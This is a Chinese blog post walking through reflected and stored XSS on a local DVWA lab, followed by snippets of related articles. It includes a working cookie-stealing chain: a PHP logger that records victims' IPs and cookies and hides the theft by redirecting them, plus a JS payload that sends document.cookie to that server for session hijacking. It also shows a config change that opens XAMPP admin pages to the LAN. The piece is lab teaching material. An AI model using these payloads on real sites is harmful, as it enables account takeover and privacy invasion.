xss-dvwa平台下的实战

课堂上要求学生自由组队准备一个安全相关的主题讲解,于是会兴冲冲的找到学霸想抱大腿。最近应大腿的需求,决定要补充ppt一部分内容以掩盖我们打酱油的真面目,大胖这里是学霸的外号的意思是一个酱油的技术点太酱油,两个酱油的技术点拼起来就刁刁的叻!

前一篇酱油技术是

登陆会话劫持

还有一个酱油技术就是本文了。

也是醉了,后来确定的主题竟然是如何帮助同学查看室友空间,更醉的是,这种猥琐的事情要让我来做!然而我并不会web安全,我只想安安静静的看汇编!

于是经过一番吐槽之后我躁动的心终于平静下来,下面进入正题:

环境

服务器:Apache

数据库:MySQL

网址:192.168.1.104/dvwa

访问者:192.168.1.113

关于如何安装dvwa网上的教程很多,这里不再敖述,可以搜索一下,需要注意的是,xampp端口被占用和局域网访问的两个问题。

端口占用

1.80端口冲突,解决方法:

打开目录C:\xampp\apache\conf(我的安装目录为C:\xampp)下的httpd.conf文件,将Listen 80和 ServerName localhost:80中的80改为8081或其它值(尽量不要使用0-1023端口,这个是系统保留端口),要保持一致。

2.监听端口443冲突,解决方法:

打开目录C:\xampp\apache\conf\extra (我的安装目录为C:\xampp)下的httpd-ssl.conf文件,将Listen 443这句注释掉:# Listen 443或将443改为4433或其它值(尽量不要使用0-1023)。

局域网访问

  1. 修改httpd.conf(xampp/apache/conf/httpd.conf)

    把Listen 80改成Listen 192.168.0.188:80

    192.168.0.188换成实际服务器的ip地址

  2. 打开httpd-xampp.conf(/xampp/apache/conf/extra/httpd-xampp.conf)

    搜索关键字: Order deny,allow

    然后在Order deny,allow下面一行有句 Deny from all

    在Deny from all前加上#

    完整形式:

<LocationMatch "^/(?i:(?:xampp|security|licenses|phpmyadmin|webalizer|server-status|server-info))">
    Order deny,allow
    #Deny from all
    Allow from 127.0.0.0/8
       # Require local
    ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var
</LocationMatch>

配置好环境,在局域网下能够成功访问,就可以开始着手攻击了

攻击

xss reflected

发现漏洞

xss发生在一切由输入输出的地方。访问网页的时候发现遇到这样的窗口,在输入venidic的时候,浏览器直接返回成这样的数据

右键查看源码,发现根本没有做任何的过滤就直接返回了

<div class="vulnerable_code_area">

        <form name="XSS" action="#" method="GET">
            <p>What‘s your name?</p>
            <input type="text" name="name">
            <input type="submit" value="Submit">
        </form>

        <pre>Hello venidic </pre>

    </div>

那我们直接可以利用</pre>闭合掉前面的一个<pre>标签,然后用<pre>闭合掉</pre>,在中间就可以填写攻击代码了

构造测试代码

</pre><script>alert(‘xss‘)</script><pre>

测试成功

利用漏洞

之前一直用xss就是弹个框以证实漏洞的存在,然而着并没有什么卵用,xss的猥琐之处在于它处于前端,可以很容易的造成js脚本在浏览器任意执行,达到窃取cookie,劫持用户会话,甚至是开发出xss worm。因为本人web实在太渣,所以只会讲最基本的盗取cookie的利用方式:

想要记录来访者cookie需要写一个脚本,如果受害者触发了这段js,则脚本就会记录下受害者的cookie

截获cookie的php脚本

<?php

$cookie = $_GET[‘cookie‘]; //以GET方式获取cookie变量值
$ip = getenv (‘REMOTE_ADDR‘); //远程主机IP地址
$time=date(‘Y-m-d g:i:s‘); //以“年-月-日 时:分:秒”的格式显示时间
$referer=getenv (‘HTTP_REFERER‘); //链接来源
$agent = $_SERVER[‘HTTP_USER_AGENT‘]; //用户浏览器类型

$fp = fopen(‘cookie.txt‘, ‘a‘); //打开cookie.txt,若不存在则创建它
fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //写入文件
fclose($fp); //关闭文件

header("Location: http://www.baidu.com")//重定向到baidu,防止发现
?>

那么js攻击代码就可以这样写:

</pre><script>document.location = ‘http://192.168.1.104/acceptcookie.php?cookie=‘ + document.cookie;</script><pre>

点击提交

网页被重定向到了baidu,证明攻击成功

打开脚本同目录下的cookie.txt

劫持成功

打开桂林老兵浏览器,修改cookie,然后登陆主页,无需密码直接进入

利用成功

xss stored

发现漏洞

继续浏览,发现有留言本

随便填写,发现没有任何过滤

攻击代码

message处:

<script>alert(‘xss‘)</script>

提交

触发成功,退出网站

此时,我作为网站管理员从服务器出进入网站管理

触发成功,作为游客浏览留言板,同样触发成功。

利用漏洞

xss利用相当灵活,最简单的cookie窃取的方法同上。

抱大腿的工作到这里就结束啦,希望学霸上课演讲顺利!不要辜负我在考试周前放弃预习,熬夜准备这个鬼而长出来的痘痘!

//                            _ooOoo_
//                           o8888888o
//                           88" . "88
//                           (| -_- |)
//                            O\ = /O
//                        ____/`---‘\____
//                      .   ‘ \\| |// `.
//                       / \\||| : |||// \
//                     / _||||| -:- |||||- \
//                       | | \\\ - /// | |
//                     | \_| ‘‘\---/‘‘ | |
//                      \ .-\__ `-` ___/-. /
//                   ___`. .‘ /--.--\ `. . __
//                ."" ‘< `.___\_<|>_/___.‘ >‘"".
//               | | : `- \`.;`\ _ /`;.`/ - ` : | |
//                 \ \ `-. \_ __\ /__ _/ .-` / /
//         ======`-.____`-.___\_____/___.-`____.-‘======
//                            `=---=‘
//
//         .............................................  
时间: 2024-10-07 05:51:46

xss-dvwa平台下的实战的相关文章

xss其他标签下的js用法总结大全

前段时间我遇到一个问题,就是说普通的平台获取cookie的语句为↓ Default 1 <script src=js地址></script> 实际上我们的测试语句可能为↓ Default 1 <script>alert("90sec")</script> 也就是说js语句实际上是位于↓<script></script>的中间. 包括<img>.<input>.<object>.&

微信公众平台网页开发实战--2.从手机相册中选照片然后分享

通过对需求的了解,可以将其分解为: (1)微信端手机用户,可以使用微信的JSSDK. (2)选取图片,使用JSSDK的“chooseImage”,由于分享图片时本地地址无法分享,因此还需要JSSDK的“uploadImage”. (3)分享到朋友圈,需要JSSDK的“onMenuShareTimeline”. 综合起来,业务逻辑如图4.5所示. 图4.5  业务逻辑结构图 首先将JSSDK的环境复制一份到本节目录下,创建index.html文件.imageSharing.js文件,目录结构如图4

Windows平台下安装Hadoop

1.安装JDK1.6或更高版本 官网下载JDK,安装时注意,最好不要安装到带有空格的路径名下,例如:Programe Files,否则在配置Hadoop的配置文件时会找不到JDK(按相关说法,配置文件中的路径加引号即可解决,但我没测试成功). 2.安装Cygwin Cygwin是Windows平台下模拟Unix环境的工具,需要在安装Cygwin的基础上安装Hadoop,下载地址:http://www.cygwin.com/ 根据操作系统的需要下载32位或64的安装文件. 1).双击下载好的安装文

xss challenges平台学习

虽然在很早之前就接触过xss,有一段时间还就着一本书研究过,但是始终没有实感,掌握的也不够系统,所以现在借着这几个平台再学习一遍 首先来玩一玩xss challenge平台 第一关:http://xss-quiz.int21h.jp/?sid=2a75ff06e0147586b7ceb0fe68ee443b86a6e7b9 第二关:http://xss-quiz.int21h.jp/stage2.php?sid=f2d7d60125bdddb208fa757ee5cdae22f6818cd1 提

[转]Windows平台下安装Hadoop

1.安装JDK1.6或更高版本 官网下载JDK,安装时注意,最好不要安装到带有空格的路径名下,例如:Programe Files,否则在配置Hadoop的配置文件时会找不到JDK(按相关说法,配置文件中的路径加引号即可解决,但我没测试成功). 2.安装Cygwin Cygwin是Windows平台下模拟Unix环境的工具,需要在安装Cygwin的基础上安装Hadoop,下载地址:http://www.cygwin.com/ 根据操作系统的需要下载32位或64的安装文件. 1).双击下载好的安装文

企业大数据平台下数仓建设思路

免费开通大数据服务:https://www.aliyun.com/product/odps 介然(李金波),阿里云高级技术专家,现任阿里云大数据数仓解决方案总架构师.8年以上互联网数据仓库经历,对系统架构.数据架构拥有丰富的实战经验,曾经数据魔方.淘宝指数的数据架构设计专家. 与阿里云大数据数仓结缘 介然之前在一家软件公司给企业客户做软件开发和数仓开发实施,数仓开发和实施都是基于传统的基础架构.2008年加入阿里进入淘宝数据平台部后,他开始接触分布式计算平台Hadoop. 初始时在Hadoop平

XCore是一款.NET平台下的免费开源框架

XCore是一款.NET平台下的免费开源框架,XCore的设想是为广大码农提供一款上手快.使用简单.开发效率又高的框架,经过上百个项目实战的检验,已是一款非常适用于商业项目及创业团队的开发框架. 特点: 简洁易用 ? ? 简单.易学.易上手是我们对这套框架的基本定位. 从实战出发 ? ? XCore的发展是从实战开始的,两年以来,XCore已成功应用到数十个项目中,在WebEngine.XCenter.Weback.翠花网.未来鸟连锁店系统等项目中,XCore均是最核心的底层框架,甚至是唯一被引

1.6 xss挑战平台练习

------------------------- XSS挑战之旅 ------------------------- 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA   密码:85g8 我这里使用本地搭建,方便分析代码,安装好的页面如下: Level 1: 分析一下源代码中的判

微信公众平台网页开发实战--1.微信分享一个网页到朋友圈

对微信的JSSDK进行封装一下,创建一份类似的文件结构,增加index.html与shareApi.js文件,结构如图3.3所示. 图3.3  3.2节文件结构 另外,提醒读者一下,wxJSSDK.js文件的JSSDK环境配置中,需要更改一下配置参数,代码如下: 01 jsApiList: [ // 其他代码略 02 "onMenuShareTimeline", 03 "onMenuShareAppMessage", 04 "onMenuShareQQ&q